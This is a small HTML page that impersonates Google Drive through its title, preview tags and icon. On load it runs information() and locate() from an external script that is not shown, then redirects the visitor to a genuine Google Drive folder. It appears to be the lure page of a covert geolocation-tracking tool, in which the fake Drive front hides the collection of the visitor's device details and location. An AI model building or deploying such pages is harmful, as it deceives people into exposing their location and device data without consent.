<!DOCTYPE html>
<html lang="en">
<head>
	<meta property="og:title" content="Drive Google">
	<meta property="og:site_name" content="Drive Google">
	<meta property="og:description" content="">
	<meta property="og:image" content="https://upload.wikimedia.org/wikipedia/commons/thumb/1/12/Google_Drive_icon_%282020%29.svg/220px-Google_Drive_icon_%282020%29.svg.png">
	<title>Drive Google</title>
	<script type="text/javascript">
    	if (window.location.protocol == "http:") {
        	var restOfUrl = window.location.href.substr(5);
        	
    	}
    </script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script type="text/javascript" src="js/location.js"></script>
</head>
<body onload="information();locate(function(){window.location='https://drive.google.com/drive/folders/1S6rSpd_qA6Ekr7HLAg3NC3NV--FJ9XGd';}, function(){$('#change').html('Failed');});">
</body>
</html>